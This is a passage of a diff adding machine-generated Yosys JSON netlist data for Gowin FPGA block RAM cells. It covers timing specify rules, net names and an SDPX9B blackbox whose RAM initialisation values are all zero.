"T_RISE_MAX": "00000000000000000000000110100011", + "T_RISE_MIN": "00000000000000000000000110100011", + "T_RISE_TYP": "00000000000000000000000110100011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1622.2-1622.43" + }, + "port_directions": { + "DAT": "input", + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DAT": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ], + "DST": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ], + "EN": [ "1" ], + "SRC": [ 108 ] + } + }, + "$specify$195": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1623.2-1623.35" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 107 ], + "DST_EN": [ "1" ], + "SRC": [ 112 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$196": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1624.2-1624.35" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 108 ], + "DST_EN": [ "1" ], + "SRC": [ 113 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$197": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1625.2-1625.32" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 108 ], + "DST_EN": [ "1" ], + "SRC": [ 111 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$198": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1626.2-1626.32" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 107 ], + "DST_EN": [ "1" ], + "SRC": [ 109 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$199": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1627.2-1627.32" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 108 ], + "DST_EN": [ "1" ], + "SRC": [ 110 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$200": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1628.2-1628.32" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 108 ], + "DST_EN": [ "1" ], + "SRC": [ 111 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$201": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1629.2-1629.33" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 107 ], + "DST_EN": [ "1" ], + "SRC": [ 105 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$202": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1630.2-1630.33" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 108 ], + "DST_EN": [ "1" ], + "SRC": [ 106 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$203": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000100100", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1631.2-1631.31" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 107 ], + "DST_EN": [ "1" ], + "SRC": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$204": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000001110", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1632.2-1632.32" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 107 ], + "DST_EN": [ "1" ], + "SRC": [ 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$205": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000001110", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1633.2-1633.32" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 108 ], + "DST_EN": [ "1" ], + "SRC": [ 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104 ], + "SRC_EN": [ "1" ] + } + }, + "$specify$206": { + "hide_name": 1, + "type": "$specrule", + "parameters": { + "DST_PEN": "1", + "DST_POL": "1", + "DST_WIDTH": "00000000000000000000000000000001", + "SRC_PEN": "0", + "SRC_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000011", + "TYPE": "$setup", + "T_LIMIT2_MAX": "00000000000000000000000000000000", + "T_LIMIT2_MIN": "00000000000000000000000000000000", + "T_LIMIT2_TYP": "00000000000000000000000000000000", + "T_LIMIT_MAX": "00000000000000000000000000111110", + "T_LIMIT_MIN": "00000000000000000000000000111110", + "T_LIMIT_TYP": "00000000000000000000000000111110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1634.2-1634.35" + }, + "port_directions": { + "DST": "input", + "DST_EN": "output", + "SRC": "input", + "SRC_EN": "output" + }, + "connections": { + "DST": [ 107 ], + "DST_EN": [ "1" ], + "SRC": [ 74, 75, 76 ], + "SRC_EN": [ "1" ] + } + } + }, + "netnames": { + "ADA": { + "hide_name": 0, + "bits": [ 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1614.14-1614.17" + } + }, + "ADB": { + "hide_name": 0, + "bits": [ 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1614.19-1614.22" + } + }, + "BLKSEL": { + "hide_name": 0, + "bits": [ 74, 75, 76 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1613.13-1613.19" + } + }, + "CEA": { + "hide_name": 0, + "bits": [ 109 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1617.7-1617.10" + } + }, + "CEB": { + "hide_name": 0, + "bits": [ 110 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1617.12-1617.15" + } + }, + "CLKA": { + "hide_name": 0, + "bits": [ 107 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1616.7-1616.11" + } + }, + "CLKB": { + "hide_name": 0, + "bits": [ 108 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1616.13-1616.17" + } + }, + "DI": { + "hide_name": 0, + "bits": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1612.14-1612.16" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1611.15-1611.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 111 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1618.7-1618.10" + } + }, + "RESETA": { + "hide_name": 0, + "bits": [ 112 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1619.7-1619.13" + } + }, + "RESETB": { + "hide_name": 0, + "bits": [ 113 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1619.15-1619.21" + } + }, + "WREA": { + "hide_name": 0, + "bits": [ 105 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1615.7-1615.11" + } + }, + "WREB": { + "hide_name": 0, + "bits": [ 106 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1615.13-1615.17" + } + } + } + }, + "SDPX9B": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:903.1-981.10" + }, + "parameter_default_values": { + "BIT_WIDTH_0": "00000000000000000000000000100100", + "BIT_WIDTH_1": "00000000000000000000000000100100", + "BLK_SEL_0": "000", + "BLK_SEL_1": "000", + "INIT_RAM_00": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": 